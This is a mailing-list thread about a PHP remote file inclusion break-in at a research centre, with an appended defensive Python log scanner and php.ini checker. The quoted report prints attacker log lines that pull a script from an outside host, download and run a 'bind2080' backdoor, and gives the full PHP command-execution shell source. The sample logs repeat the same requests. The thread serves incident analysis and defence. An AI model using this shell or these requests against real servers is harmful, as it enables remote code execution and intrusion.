Re: Hack attempt
Not really an exploit IMO. It is a feature in PHP which you should
disable if you don't use it. (Edit php.ini OR httpd.conf and add a
disable_functions directive). You shouldn't be too worried, the 'hacker'
can't get access to anything that the web server user doesn't have
access to, but don't take any chances either. (a simple rm -rf can wipe
you out and leave you wishing you had backups)
* Norbert Crettol (norbert.crettol@idiap.ch) wrote:
> Hi all.
>
> This is my first post here. I'm Norbert Crettol, one of the sysadmins
> of Idiap, a research center in Switzerland (www.idiap.ch).
>
> We've had an undesired visitor, last night, that I discovered in the
> reports of tripwire.
>
> Here are the logs we got (we get a remote copy of the web server logs
> in another host). As of the second line, I've stripped the head and
> the tail of the line which is always the same.
> --- begin ---
> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
> --- end ---
> I've seen no other
>
> It looks like bind8080 has created a directory /var/lock/.tmp
> and expanded an (owned by the web server owner) archive there. Here
> is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fév 11 03:55 fuck*
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
> Here is the content of http://www.bosscalvin.com/inject.txt :
> --- begin ---
> <font color="red">
> <br><font face="Comic Sans MS" size="2"><center>
> <b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
> <b>#</b> CMD PHP : <br>
> <b>#</b> Released by : <b>SecurityCorp</b><br>
> <b>#</b> Edited by CaEm
> <br>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <pre><font face="Verdana" size="1">
> <?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
> ?>
> </font></pre>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
> --- end ---
>
> Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> uploaded scripts.
>
> Norbert
>
--
lynx -dump www.infiltrated.net/wtf |
grep "+-" |
sed 's/\\//g;s/\// /g;s/\&//;s/-/ /g' |
awk '{print $2,$3,$4,$5}' |
sed 's/ //g'
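Two defender-side checks for the incident quoted above, as an added example that is not part of the thread and not code from either poster. The first walks access-log lines of the shape Norbert pasted and flags any query parameter carrying a remote URL (the remote file inclusion), recording the decoded `cmd` value for the incident timeline. The second parses a php.ini fragment and reports which shell-executing functions are still callable, following the reply's `disable_functions` advice, and whether `allow_url_fopen` (the directive that lets `include` pull from a URL) is on. The log lines, IP addresses, timestamps and php.ini text are constructed samples; the list of shell-executing functions is an assumption of this example.

```python
"""Added example, not part of the original thread: two defender-side checks
for the kind of incident quoted above. Log lines and php.ini text below are
constructed samples (the request lines mirror the quoted report)."""
import re
from urllib.parse import unquote

# PHP functions that hand a string to a shell or spawn a process (assumed list).
SHELL_FUNCTIONS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode each side.
    Done by hand so a ';' inside a value (shell command separator) survives."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def inspect_request(line):
    """Return a finding for one access-log line, or None if it looks benign.
    A finding means some parameter carried a remote URL (remote file
    inclusion); the decoded 'cmd' value is recorded when present."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = parse_query(query)
    remote = {k: v for k, v in params.items() if REMOTE_URL_RE.match(v)}
    if not remote:
        return None
    return {
        "path": path,
        "status": int(m.group("status")),
        "remote_params": remote,
        "cmd": params.get("cmd"),
    }


def scan_access_log(lines):
    """Run inspect_request over many lines and keep only the findings."""
    return [f for f in (inspect_request(line) for line in lines) if f]


def check_disable_functions(ini_text):
    """Parse a php.ini fragment: list which SHELL_FUNCTIONS are still callable
    and whether allow_url_fopen (URL wrappers for include) is enabled."""
    disabled = set()
    allow_url_fopen = True  # PHP's default when the directive is absent
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an ini comment
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip().lower()
        if key == "disable_functions":
            disabled.update(f.strip() for f in value.split(",") if f.strip())
        elif key == "allow_url_fopen":
            allow_url_fopen = value in ("1", "on", "true", "yes")
    return {
        "enabled_shell_functions": [f for f in SHELL_FUNCTIONS if f not in disabled],
        "allow_url_fopen": allow_url_fopen,
    }


# Constructed samples: two lines shaped like the quoted report, one benign hit.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jul/2004:03:47:01 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [20/Jul/2004:03:47:09 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la HTTP/1.0" 200 1201 "-" "Mozilla/4.0"',
    '192.0.2.20 - - [20/Jul/2004:03:48:00 +0200] "GET /index.php?bodyfile=intro.txt HTTP/1.0" 200 3100 "-" "Mozilla/4.0"',
]

WEAK_INI = "; constructed sample: nothing disabled\nallow_url_fopen = On\ndisable_functions =\n"
HARDENED_INI = (
    "allow_url_fopen = Off\n"
    "disable_functions = system, exec, shell_exec, passthru, popen, proc_open\n"
)

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(check_disable_functions(WEAK_INI))
    print(check_disable_functions(HARDENED_INI))
```

The query string is split by hand rather than with `urllib.parse.parse_qs` because older Python versions also treated `;` as a pair separator, which would split the quoted `cd /var/lock/;ls -la` into two parameters and hide the chained command. Disabling the shell functions limits what an included script can do; turning `allow_url_fopen` off removes the remote include itself, which is the root cause in the quoted report.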